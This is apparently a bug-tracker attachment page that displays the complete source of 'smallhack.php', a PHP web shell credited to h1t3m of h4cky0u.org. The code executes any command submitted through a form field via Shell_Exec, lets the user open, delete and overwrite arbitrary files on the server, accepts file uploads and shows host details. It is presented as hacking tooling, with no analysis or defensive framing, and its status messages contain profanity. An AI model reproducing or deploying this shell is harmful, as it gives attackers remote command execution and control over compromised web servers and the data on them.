Ticket #9: smallhack.php

File smallhack.php, 6.0 KB (added by anonymous, 18 years ago)

vbnnbbvbbbvv

Line 
1<html>
2<head>
3<title>SmallHack - Private</title>
4</head>
5<body bgcolor="#000000" text="blue">
6<h4 align=center><font color="blue">SmallHack Private Edition</font></h4>
7<p align=center><font color="white">SmallHack© is coded by h1t3m of h4cky0u.org and is not responsible for you or your actions with this shell. You can contact me at hackedbyh1t3m[at]gmail[dot]com with any questions, problems or bugs.<br><small>Shell made on: 15/1/2007 (dd/mm/yyyy)</small></font></p>
8<?php
9//First we want to check if safe mode is activated...
10if( ini_get('safe_mode') ) {
11 print '<center><font color=red><b><u>Safe Mode Is On :(</u></b></font></center>';
12} else {
13 print '<center><font color="#00CC00"><b><u>Safe Mode Is Off w00t!</u></b></font></center>';
14}
15?>
16<hr>
17<!-- Here we grab some info on the host + your ip and browser info -->
18<tr>
19 <td width="49%" height="142">
20 <p align="center">
21 <font face="Verdana" style="font-size: 8pt"><b><font color=red>Working Directory:</font></b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
22 <br />
23 <b><font color=red>Server Soft:</font></b> <? echo $SERVER_SOFTWARE ?><br>
24 <b><font color=red>Your IP:</font></b> <? echo $_SERVER['REMOTE_ADDR']; ?><br>
25 <b><font color=red>Browser info:</font></b> <? echo $_SERVER['HTTP_USER_AGENT']; ?>
26<hr>
27<!--This is the command prompt -->
28<center>
29<form method=POST>
30<br>
31<h4 align=center>CMD Line</h4>
32<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
33style="background:#000000;color:#00EE00;">
34<hr>
35<pre>
36<b>
37<? $cmd = $_REQUEST["-cmd"];?>
38<? if($cmd != "") print Shell_Exec($cmd);?>
39</pre>
40</b>
41</form>
42</center>
43<hr>
44<!-- FILE EDITOR BELOW -->
45
46 <td width="49%" height="25" bgcolor="#FCFEBA">
47 <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
48 </tr>
49 <tr>
50 <td width="49%" height="231">
51<font face="Verdana" style="font-size: 11pt">
52 <p align="center"><?
53$scriptname = $_SERVER['SCRIPT_NAME'];
54$filename = $_POST["filename"];
55
56if($_POST["submit"] == "Open")
57{
58 if(file_exists($filename))
59 {
60 $filecontents = htmlentities(file_get_contents($filename));
61
62 if(!$filecontents)
63 $status = "<font face='Verdana' style='font-size: 8pt'>Some form of error.. Try again?</font>";
64 }
65 else
66 $status = "<font face='Verdana' style='font-size: 8pt'>Put down the crack-pipe, file dosen't exist!</font>";
67}
68else if($_POST["submit"] == "Delete")
69{
70 if(file_exists($filename))
71 {
72 if(unlink($filename))
73 $status = "<font face='Verdana' style='font-size: 8pt'>Deleted the little fucker sucessfully!</font>";
74 else
75 $status = "<font face='Verdana' style='font-size: 8pt'>Can't delete the bastard!</font>";
76 }
77 else
78 $status = "<font face='Verdana' style='font-size: 8pt'>Wtf? that file don't exist</font>";
79}
80else if($_POST["submit"] == "Save")
81{
82 $filecontents = stripslashes(html_entity_decode($_POST["contents"]));
83
84 if(file_exists($filename))
85 unlink($filename);
86
87 $handle = fopen($filename, "w");
88
89 if(!$handle)
90 $status = "<font face='Verdana' style='font-size: 8pt'>God damn, can't open the fucking file! </font>";
91 else
92 {
93 if(!fwrite($handle, $filecontents))
94 $status = $status."<font face='Verdana' style='font-size: 8pt'>Can't write to the lil fucker!</font>";
95
96 fclose($handle);
97 }
98
99 $filecontents = htmlentities($filecontents);
100}
101else
102{
103 $status = "<font face='Verdana' style='font-size: 8pt'>No bitchz l04d3d!</font>";
104}
105?>
106<table border="0" align="center">
107 <tr>
108 <td>
109 <table width="100%" border="0">
110 <tr>
111 <td>
112 <form method="post" action="<?echo $scriptname;?>">
113 <input name="filename" type="text" value="<?echo $filename;?>" size="20">
114 <input type="submit" name="submit" value="Open">
115 <input type="submit" name="submit" value="Delete">
116 </td>
117 </tr>
118 </table>
119 </td>
120 </tr>
121 <tr>
122 <td> <font face="Verdana" style="font-size: 11pt">
123 <textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
124 <input type="submit" name="submit" value="Save">
125 <input type="reset" value="Reset">
126 </form>
127</td>
128</tr>
129<tr>
130<td>
131 <h2><?echo $status;?></h2>
132</td>
133</tr>
134</table> </td>
135<!-- END FILE EDITOR -->
136<hr>
137<!-- Here we can upload files -->
138<form enctype="multipart/form-data" method="post">
139<p align="center"><br>
140<br>
141<font face="Verdana" style="font-size: 8pt">Upload files.</font><br>
142<input type="file" name="file" size="20"><br>
143<br>
144<font style="font-size: 5pt"> </font><br>
145<input type="submit" value="Upload File!"> <br>
146 </p>
147</form>
148<?php
149
150function check_file()
151{
152global $file_name, $filename;
153 $backupstring = "copy_of_";
154 $filename = $backupstring."$filename";
155
156 if( file_exists($filename))
157 {
158 check_file();
159 }
160}
161
162if(!empty($file))
163{
164 $filename = $file_name;
165 if( file_exists($file_name))
166 {
167 check_file();
168 echo "<p align=center>File already on server...</p>";
169 }
170
171 else
172 {
173 copy($file,"$filename");
174 if( file_exists($filename))
175 {
176 echo "<p align=center>File uploaded!</p>";
177 }
178 elseif(! file_exists($filename))
179 {
180 echo "<p align=center>File not found :(</p>";
181 }
182 }
183}
184?>
185<font face="Verdana" style="font-size: 8pt">
186<p align=\"center\"></font>
187</td>
188 </tr>
189<hr>
190<!-- Thats it for this version credits and shouts below -->
191<center>
192<pre>
193_/ _/ _/ _/ _/_/_/ _/ _/
194_/ _/ _/_/ _/_/_/_/ _/ _/_/ _/_/
195_/_/_/_/ _/ _/ _/_/ _/ _/ _/
196_/ _/ _/ _/ _/ _/ _/
197_/ _/ _/ _/_/ _/_/_/ _/ _/
198h1t3m - hacking it for 2008 ;)
199</pre>
200</center>
201<h4 align=center><font color="white"><b>=> Greetz to aStRo, er0r, |)34B|_0 & all of h4cky0u.org (Screw the imi-tators... You know who you are) <=</b><br />©2008 by h1t3m... Visit h4cky0u.org for all your Hacking needs!</font></h4>
202</body>
203</html>